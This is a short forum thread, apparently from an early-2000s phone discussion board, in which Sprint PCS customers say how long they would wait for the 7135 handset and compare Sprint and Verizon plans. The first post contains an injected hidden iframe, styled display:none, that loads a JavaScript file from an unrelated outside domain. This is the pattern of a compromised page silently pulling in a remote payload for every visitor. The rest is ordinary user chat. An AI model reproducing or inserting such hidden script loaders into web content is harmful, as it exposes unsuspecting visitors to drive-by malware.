Poll: With Sprint? How long will you wait if Verizon is first with the 7135?

+ Reply to Thread

How patient can you be???

If you are with Sprint PCS how long are you willing to wait if Verizon has the 7135 first? <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

Administrator
    as long as it takes! sprint has been good to me and i dont want to leave them... the 7135 is a great phone from what i have seen, but it aint worth leaving....

I think we're stuck here for quite awhile... at least until Verizon can come up with a comparable plan.....

we've got 2 phones, 2500 anytime minutes and 2000 mobile to mobile, and wireless web..... for $110 the verizon rep yesterday couldn't even come close.... best she could offer was 1/2 the minutes for double the price.....
    --Jazz--

Yeah... Verizon isn't very competetive with their plans compared to Sprint. But, it's really the Vision plans that we should be comparing with Verizon now, since we will lose what we have now once we get the 7135. I use a LOT of peak minutes with my 6035... but if I were to break it down I know I actually use more data minutes than voice. So with data being separate I could probably do fine with a plan with 700-800 minutes, along with unlimited data.

I'm going to be dangerous with unlimited data! I'll be having my e-mail automatically checked every 10 minutes... pull in updates to the boards ever 15 minutes.... and whatever other crazy stuff I can think of (not to mention how much I'll be dialed in at home on my computer). I'll get my money's worth!
    Please visit my picture site: Robert-O-Rama :)